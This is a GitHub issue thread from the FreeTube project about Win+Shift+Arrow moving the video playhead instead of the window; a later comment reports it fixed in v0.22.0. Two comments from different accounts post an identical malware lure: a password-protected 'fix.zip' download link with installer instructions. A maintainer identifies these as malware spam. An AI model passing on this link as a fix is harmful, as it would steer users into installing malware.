### ISSUE TITLE
[Bug]: Win + Shift + Arrow is overridden by video controls

### ISSUE THREAD

**Issue by T0RNATO** [FreeTubeApp/FreeTube#5619]
### Guidelines

- [X] I have encountered this bug in the [latest release of FreeTube](https://github.com/FreeTubeApp/FreeTube/releases).
- [X] I have encountered this bug in the [official downloads of FreeTube](https://github.com/FreeTubeApp/FreeTube#official-downloads).
- [X] I have searched the issue tracker for [open](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/FreeTubeApp/FreeTube/issues?q=is%3Aissue+is%3Aclosed) issues that are similar to the bug report I want to file, without success.
- [X] I have searched the [documentation](https://docs.freetubeapp.io/) for information that matches the description of the bug I want to file, without success.
- [X] This issue contains only one bug.

### Describe the bug

1. Open a video
2. Attempt to move the window to your other monitor using Win + Shift + L/R
3. Note that it instead moves the playhead

### Expected Behavior

Being able to move the window

### Issue Labels

keyboard control not working, usability issue

### FreeTube Version

v0.21.3 Beta

### Operating System Version

Windows 11 23H2

### Installation Method

.exe

### Primary API used

Invidious API

### Nightly Build

- [ ] I have encountered this bug in the latest [nightly build](https://docs.freetubeapp.io/development/nightly-builds).

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by T0RNATO** [comment]
that seems extremely suspect I'm gonna be real

**Comment by absidue** [comment]
@T0RNATO Yes it wad, unfortunately it looks like lots of GitHub repos are getting hit by the same malware comments, it's always different GitHub accounts but almost identical text. I really hope GitHub does something about it soon.

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by UnconsciousBlaringHuman** [comment]
It works perfectly for me (Win 10 22H2, Local API, v0.21.3 Beta). I am using FancyZones but it shouldn't matter since it only overrides Win + Arrow

**Comment by efb4f5ff-1298-471a-8973-3d47447115dc** [comment]
@T0RNATO is this still an issue for you in v0.22.0?

**Comment by T0RNATO** [comment]
@efb4f5ff-1298-471a-8973-3d47447115dc appears to be fixed, thanks!
